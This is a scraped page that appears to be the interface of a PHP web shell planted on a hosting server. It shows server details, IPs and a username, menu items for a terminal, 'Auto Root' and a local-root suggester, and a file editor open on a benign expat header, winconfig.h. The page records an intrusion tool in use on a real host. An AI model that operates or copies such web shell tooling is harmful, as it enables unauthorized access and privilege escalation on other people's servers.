Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php44 /
usr /
include /
php /
ext /
xml /
expat /
Delete
Unzip
Name
Size
Permission
Date
Action
ascii.h
1.77
KB
-rw-r--r--
2023-05-22 12:14
asciitab.h
1.72
KB
-rw-r--r--
2023-05-22 12:14
expat.h
35.5
KB
-rw-r--r--
2023-05-22 12:14
iasciitab.h
1.79
KB
-rw-r--r--
2023-05-22 12:14
internal.h
1.83
KB
-rw-r--r--
2023-05-22 12:14
latin1tab.h
1.77
KB
-rw-r--r--
2023-05-22 12:14
nametab.h
6.88
KB
-rw-r--r--
2023-05-22 12:14
utf8tab.h
1.72
KB
-rw-r--r--
2023-05-22 12:14
winconfig.h
769
B
-rw-r--r--
2023-05-22 12:14
xmlrole.h
2.95
KB
-rw-r--r--
2023-05-22 12:14
xmltok.h
10.92
KB
-rw-r--r--
2023-05-22 12:14
xmltok_impl.h
661
B
-rw-r--r--
2023-05-22 12:14
Save
Rename
/*================================================================ ** Copyright 2000, Clark Cooper ** All rights reserved. ** ** This is free software. You are permitted to copy, distribute, or modify ** it under the terms of the MIT/X license (contained in the COPYING file ** with this distribution.) */ #ifndef WINCONFIG_H #define WINCONFIG_H #define WIN32_LEAN_AND_MEAN #include <windows.h> #undef WIN32_LEAN_AND_MEAN #include <memory.h> #include <string.h> #define XML_NS 1 #define XML_DTD 1 #define XML_CONTEXT_BYTES 1024 /* we will assume all Windows platforms are little endian */ #define BYTEORDER 1234 /* Windows has memmove() available. */ #ifndef HAVE_MEMMOVE #define HAVE_MEMMOVE #endif #endif /* ndef WINCONFIG_H */